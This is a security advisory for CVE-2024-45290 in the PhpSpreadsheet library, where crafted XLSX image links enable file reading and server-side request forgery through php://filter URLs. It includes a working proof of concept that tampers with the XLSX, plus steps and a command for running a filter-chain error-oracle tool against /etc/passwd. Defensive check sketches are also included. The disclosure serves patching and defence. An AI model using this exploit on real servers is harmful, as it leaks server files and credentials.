Absolute path traversal and Server-Side Request Forgery when opening XLSX file

High
oleibman published GHSA-5gpr-w2p5-6m37 Oct 7, 2024

Package

phpoffice/phpspreadsheet (Composer)

Affected versions

>= 2.2.0, < 2.3.0
< 1.29.2
>= 2.0.0, < 2.1.1

Patched versions

2.3.0
1.29.2
2.1.1

Description

Summary

An attacker can construct an XLSX file that links media from external URLs. When the file is opened and a linked path is a URL, PhpSpreadsheet reads the target's contents to determine the image size and type. By using specially crafted php://filter URLs, an attacker can leak the contents of any file or URL.

Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component.

Details

When an XLSX file is opened, the XLSX reader calls setPath() with the path provided in the xl/drawings/_rels/drawing1.xml.rels file in the XLSX archive:

if (isset($images[$embedImageKey])) {
    // ...omit irrelevant code...
} else {
    $linkImageKey = (string) self::getArrayItem(
        $blip->attributes('http://schemas.openxmlformats.org/officeDocument/2006/relationships'),
        'link'
    );
    if (isset($images[$linkImageKey])) {
        $url = str_replace('xl/drawings/', '', $images[$linkImageKey]);
        $objDrawing->setPath($url);
    }
}

setPath() then reads the file in order to determine the file type and dimensions, if the path is a URL:

public function setPath(string $path, bool $verifyFile = true, ?ZipArchive $zip = null): static
{
    if ($verifyFile && preg_match('~^data:image/[a-z]+;base64,~', $path) !== 1) {
        // Check if a URL has been passed. https://stackoverflow.com/a/2058596/1252979
        if (filter_var($path, FILTER_VALIDATE_URL)) {
            $this->path = $path;
            // Implicit that it is a URL, rather store info than running check above on value in other places.
            $this->isUrl = true;
            $imageContents = file_get_contents($path);
            // ... check dimensions etc. ...

It's important to note here that filter_var() with FILTER_VALIDATE_URL also considers file:// and php:// URLs valid.
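The behaviour described above can be checked with a short script. This is a minimal sketch: the sample paths are made up for illustration, and isHttpUrl() is a hypothetical helper showing one possible application-level scheme check. It is not the fix shipped in the patched PhpSpreadsheet versions.

```php
<?php

// Hypothetical helper (not part of PhpSpreadsheet): accept a path only if it
// is a syntactically valid URL AND its scheme is http or https.
function isHttpUrl(string $path): bool
{
    if (filter_var($path, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = parse_url($path, PHP_URL_SCHEME);

    return is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true);
}

// Illustrative inputs only; none of these are fetched.
$candidates = [
    'https://example.com/logo.png',
    'file:///etc/passwd',
    'php://filter/resource=/etc/passwd',
    '../media/image1.gif',
];

foreach ($candidates as $candidate) {
    $passesFilterVar = filter_var($candidate, FILTER_VALIDATE_URL) !== false;
    printf(
        "%-40s filter_var: %-5s isHttpUrl: %s\n",
        $candidate,
        var_export($passesFilterVar, true),
        var_export(isHttpUrl($candidate), true)
    );
}
```

The point of the comparison is that FILTER_VALIDATE_URL only validates syntax. It says nothing about which stream wrapper file_get_contents() will end up using.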

The attacker can set the path to anything:

<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="this can be whatever" />
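Because the Target attribute is fully attacker-controlled, an application that accepts uploads could inspect the relationships XML before handing the file to the reader. The sketch below assumes the caller has already extracted the contents of a .rels part as a string. findSchemeTargets() and the sample XML are hypothetical, and the scheme test is deliberately coarse.

```php
<?php

// Namespace used by OPC relationship parts (*.rels).
const RELS_NS = 'http://schemas.openxmlformats.org/package/2006/relationships';

// Hypothetical pre-scan helper (not part of PhpSpreadsheet): return every
// Relationship Target that starts with a URI scheme such as "php:" or "file:".
function findSchemeTargets(string $relsXml): array
{
    $dom = new DOMDocument();
    if (!$dom->loadXML($relsXml)) {
        throw new InvalidArgumentException('Could not parse relationships XML');
    }

    $found = [];
    foreach ($dom->getElementsByTagNameNS(RELS_NS, 'Relationship') as $rel) {
        $target = $rel->getAttribute('Target');
        // Relative paths like "../media/image1.gif" have no scheme prefix.
        if (preg_match('~^[a-z][a-z0-9+.\-]*:~i', $target) === 1) {
            $found[] = $target;
        }
    }

    return $found;
}

// Made-up sample: one ordinary embedded image, one tampered link.
$sample = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
      Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
      Target="../media/image1.gif"/>
  <Relationship Id="rId2"
      Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
      Target="php://filter/resource=/etc/passwd"/>
</Relationships>
XML;

print_r(findSchemeTargets($sample));
```

A check like this would also flag legitimate linked images served over https, so it is a triage aid and not a replacement for upgrading to a patched version.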

The contents of the file are not made available to the attacker directly. However, using PHP filter URLs it's possible to construct an error oracle which leaks the contents of a file or URL one character at a time. The error oracle was originally invented by @hash_kitten, and the folks at Synacktiv have developed a nice tool for easily exploiting it: https://github.com/synacktiv/php_filter_chains_oracle_exploit
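For readers unfamiliar with PHP filter URLs, the following minimal sketch shows the basic mechanism only: a php://filter URL makes file_get_contents() read a local resource and pass it through a conversion filter. It uses a throwaway temporary file and a single base64 filter. It is not the error oracle itself, which chains many filters.

```php
<?php

// Create a throwaway file so the demo does not touch any real data.
$tmp = tempnam(sys_get_temp_dir(), 'demo');
file_put_contents($tmp, 'secret');

// The php://filter wrapper reads the resource and applies the named filter
// before returning the bytes to the caller.
$encoded = file_get_contents('php://filter/read=convert.base64-encode/resource=' . $tmp);

echo $encoded, PHP_EOL; // prints "c2VjcmV0", the base64 encoding of "secret"

unlink($tmp);
```

In the vulnerable code path the returned bytes are only used to determine image type and dimensions, which is why the attack needs an oracle rather than reading the output directly.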

PoC

Target file:

<?php

require 'vendor/autoload.php';

// Attack part: this would actually be done by the attacker on their machine and the resulting XLSX uploaded, but to
// keep the PoC simple, I've combined this into the same file.

$file = "book_tampered.xlsx";
$payload = $_POST["payload"]; // the payload comes from the Python script

copy("book.xlsx",$file);
$zip = new ZipArchive;
$zip->open($file);

$path = "xl/drawings/_rels/drawing1.xml.rels";
$content = $zip->getFromName($path);
$content = str_replace("../media/image1.gif", $payload, $content);
$zip->addFromString($path, $content);

$path = "xl/drawings/drawing1.xml";
$content = $zip->getFromName($path);
$content = str_replace('r:embed="rId1"', 'r:link="rId1"', $content);
$zip->addFromString($path, $content);

$zip->close();

// The actual target - note that simply opening the file is sufficient for the attack

$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader->load(__DIR__ . '/' . $file);

Add this file in the same directory:
book.xlsx

Serve the PoC from a web server. Ensure your PHP memory limit is <= 128M - otherwise you'll need to edit the Python script below.

Download the error oracle Python script from here: https://github.com/synacktiv/php_filter_chains_oracle_exploit. If your memory limit is greater than 128M, you'll need to edit the Python script's bruteforcer.py file to change self.blow_up_inf = self.join(*[self.blow_up_utf32]*15) to self.blow_up_inf = self.join(*[self.blow_up_utf32]*20). This is needed so that it generates large-enough payloads to trigger the out of memory errors the oracle relies on. Also install the script's dependencies with pip.

Then run the Python script with:

python3 filters_chain_oracle_exploit.py --target [URL of the script] --parameter payload --file /etc/passwd

Note that the attack relies on certain character encodings being supported by the system's iconv library, which PHP uses for these conversions. As far as I know, most Linux distributions have them, but notably macOS does not. So if you're developing on a Mac, you'll want to run your server in a Linux virtual machine.

Here are the results I got after about a minute of bruteforcing:

image

Impact

An attacker can access any file on the server, or leak information from arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials.

Severity

High

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE ID

CVE-2024-45290

Credits